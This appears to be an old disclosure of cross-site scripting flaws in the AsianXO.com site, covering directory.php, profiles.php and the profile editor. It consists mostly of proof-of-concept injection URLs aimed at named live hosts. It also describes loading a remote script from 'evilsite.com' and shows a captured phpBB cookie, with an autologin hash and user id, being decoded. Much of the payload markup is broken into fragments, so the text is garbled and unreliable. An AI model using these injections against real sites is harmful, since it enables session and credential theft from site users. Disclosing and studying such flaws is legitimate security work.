AsianXO.com Homepage: http://www.asianxo.com/ Effected files: directory.php profiles.php Input boxes of editing profile ---------------------------- XSS Vulnerability via dir_id: Directory.php PoC: http://www.axo2.com/directory.php?dir_id=1"><" Profiles.php PoC using malformed img tags in front a openended iframe: http://www.axo2.com/profiles.php?userid=999999999<""> inaurl injection along with The output text: This is remote text via xss.js located at evilsite.com phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2210610%22%3B%7D; phpbb2mysql_sid=362562eaac0fc1d69e574584d4f95e60','gallery','height=500,width=700,status=0');"> When converting the whole string from hex value, we notice a autologinid:# along with our cookie data that has our md5'ed hash pw in it. a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:5:"10610";}; NOTE: You can also use and it will create a popup box with the cookie data in it. PoC: http://www.axo2.com/profiles.php?userid=99999999<"">




--------------------- XSS Vulnerability of input boxes when editing profile: The location input box doesn't correctly filter all data, for a XSS example we can enter in double < with ' and no closing > <'